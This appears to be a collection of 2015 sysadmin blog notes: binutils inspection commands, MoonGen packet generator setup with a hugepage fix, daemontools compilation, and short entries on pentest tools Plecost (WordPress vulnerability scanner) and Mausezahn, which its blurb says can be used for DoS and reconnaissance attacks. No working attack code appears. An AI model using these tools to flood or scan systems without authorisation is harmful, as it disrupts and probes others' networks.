  • Supported instruction sets: MMX, 3D-Now!, SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2, SSE4A, AVX, AVX2, AES, TBM, BMI1, BMI2, HLE, ADX, CLMUL, RDRAND, RDSEED, FMA, FMA4, LWP, SVM, XOP, VMX, SMX

Examining an ELF binary with binutils

strings:       strings /usr/bin/who
dependencies:  ldd /usr/bin/yes
symbols:       nm -D -l -S /usr/bin/yes
sections:      objdump -h /usr/bin/who
data:          objdump -s -j .rodata /usr/bin/who
code:          objdump -d -r -j .text /usr/bin/who

linux: mounting dirty ext3 filesystems

# mount -o loop,ro,noexec,noload diskimage.img /media/

Thursday, June 4, 2015

moongen: fully scriptable high-speed packet generator

MoonGen is a fully scriptable high-speed packet generator built on DPDK and LuaJIT. It can saturate a 10 GBit connection with 64 byte packets on a single CPU core while executing user-provided Lua scripts for each packet.




Multi-core support allows for even higher rates. It also features precise and accurate timestamping and rate control

https://www.kernel.org/doc/Documentation/vm/hugetlbpage.txt

echo 128 > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
mkdir /mnt/huge
mount -t hugetlbfs nodev /mnt/huge


Installation steps

  1.  Install the dependencies (see below)
  2.  git submodule update --init
  3.  ./build.sh
  4.  ./setup-hugetlbfs.sh
  5.  Run MoonGen from the build directory

## Dependencies
  • * gcc
  • * make
  • * cmake
  • * kernel headers (for the DPDK igb-uio driver)


Platform:

root@aliokan-xubuntu:/usr/src/MoonGen/build# uname -a
Linux aliokan-xubuntu 3.13.0-53-generic #89-Ubuntu SMP Wed May 20 10:34:39 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 

root@aliokan-xubuntu:/usr/src/MoonGen/build# lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:    14.04
Codename:    t


# ./MoonGen quality-of-service-test.lua
EAL: Detected lcore 0 as core 0 on socket 0
EAL: Detected lcore 1 as core 1 on socket 0
EAL: Detected lcore 2 as core 2 on socket 0
EAL: Detected lcore 3 as core 3 on socket 0
EAL: Support maximum 64 logical core(s) by configuration.
EAL: Detected 4 lcore(s)
EAL: No free hugepages reported in hugepages-2048kB
PANIC in rte_eal_init():
Cannot get hugepage information
11: [./MoonGen() [0x416c23]]
10: [/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5) [0x7fb133556ec5]]
9: [./MoonGen(main+0x7c) [0x41693c]]
8: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(lua_pcall+0x2d) [0x7fb1344570cd]]
7: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0xa5d3) [0x7fb1344485d3]]
6: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0x5ce66) [0x7fb13449ae66]]
5: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0x49084) [0x7fb134487084]]
4: [/usr/src/MoonGen/deps/luajit/usr/local/lib/libluajit-5.1.so.2(+0xc6d0) [0x7fb13444a6d0]]
3: [./MoonGen(rte_eal_init+0xf83) [0x427173]]
2: [./MoonGen(__rte_panic+0xc9) [0x4167a9]]
1: [./MoonGen(rte_dump_


Çözüm:

root@aliokan-xubuntu:/usr/src/MoonGen/build# grep Huge /proc/meminfo
AnonHugePages:    223232 kB
HugePages_Total:       0
HugePages_Free:        0

HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 k


root@aliokan-xubuntu:/usr/src/MoonGen/build# echo 20 > /proc/sys/vm/nr_hugepages

root@aliokan-xubuntu:/usr/src/MoonGen/build# grep Huge /proc/meminfo
AnonHugePages:    223232 kB
HugePages_Total:      20
HugePages_Free:       20

HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 kB


logs: https://gist.github.com/anonymous/e517b7ccd8c6a0d6f682

http://www.cnblogs.com/zzqcn/p/4024205.html 

Wednesday, May 20, 2015

pentest: plecost

What's Plecost?

Plecost is a vulnerability fingerprinting and vulnerability finder for Wordpress blog engine

Installation

Install Plecost is so easy:
$ python3 -m pip install plecost
Scan a web site si so simple:
$ plecost http://SITE.com

pentest: mz - mausezahn

Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks.

Mausezahn can be used for example:
  • As traffic generator (e. g. to stress multicast networks)
  • To precisely measure jitter (delay variations) between two hosts (e. g. for VoIP-SLA verification)
  • As didactical tool during a datacom lecture or for lab exercises
  • For penetration testing of firewalls and IDS
  • For DoS attacks on networks (for audit purposes of course)
  • To find bugs in network software or appliances
  • For reconnaissance attacks using ping sweeps and port scans
  • To test network behaviour under strange circumstances (stress test, malformed packets, ...)

As of version 0.38, Mausezahn supports the following protocols:
  • ARP
  • BPDU or PVST
  • CDP
  • LLDP
  • IP
  • IGMP
  • UDP
  • TCP (stateless)
  • ICMP (partly)
  • DNS
  • RTP optionally RX-mode for jitter measurements
  • Syslog

multicast test traffic:
# mz eth1 -c 0 -d 0 -A rand -a rand -B 226.1.1.1 -t udp dp=123 -P "Multicast test packet"


Linux: dropped packet stats

ifconfig

 ... 
 RX packets:522 errors:0 dropped:0 overruns:0 frame:0
 TX packets:406 errors:0 dropped:0 overruns:0 frame:0
 ...

cat /proc/net/dev

Inter-| Receive ... 
 face | bytes packets errs drop fifo frame ... 
 eth0:  87689 785 0 0 0 0 ...
 ...

cat /proc/net/udp

 so local_address rem_address ... drops
 277: 00000000:0044 00000000:0000 ... 0 
 ...

cat /proc/net/snmp

...
Tcp: ...
Udp: InDatagrams NoPorts InErrors OutDatagrams RcvbufErrors SndbufErrors
Udp: 453 0 0 452 0 0
...
You can also see this on a per-process basis using:

cat /proc/<pid>/net/{udp,dev,snmp}

Thursday, May 7, 2015

github command line: remember credentials for a while

$ git config --global credential.helper "cache --timeout=3600"

Howto compile Bernstein’s daemontools on Ubuntu 14.04.2 LTS

aokanx@aokanx-VirtualBox:~/Downloads/admin/daemontools-0.76$ ./package/install
Linking ./src/* into ./compile...
Compiling everything in ./compile...
sh find-systype.sh > systype
rm -f compile
sh print-cc.sh > compile
...
./load envdir unix.a byte.a
/usr/bin/ld: errno: TLS definition in /lib/x86_64-linux-gnu/libc.so.6 section .tbss mismatches non-TLS reference in envdir.o
/lib/x86_64-linux-gnu/libc.so.6: error adding symbols: Bad value
collect2: error: ld returned 1 exit status
make: *** [envdir] Error 1


Solution:
Add gcc parameter: -include /usr/include/errno.h to admin/daemontools-0.76/src/conf-cc

Compile:
aokanx@aokanx-VirtualBox:~/Downloads/admin/daemontools-0.76$ sudo ./package/install
[sudo] password for aokanx:
Linking ./src/* into ./compile...
Compiling everything in ./compile...
make: Nothing to be done for `default'.
Copying commands into ./command...
Creating symlink daemontools -> daemontools-0.76...
Making command links in /command...
Making compatibility links in /usr/local/bin...
Creating /service...
Adding svscanboot to /etc/rc.local...
Reboot now to start svscan.






Startup settings:
aokanx@aokanx-VirtualBox:~/Downloads/admin/daemontools-0.76$ cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

exit 0

csh -cf '/command/svscanboot &'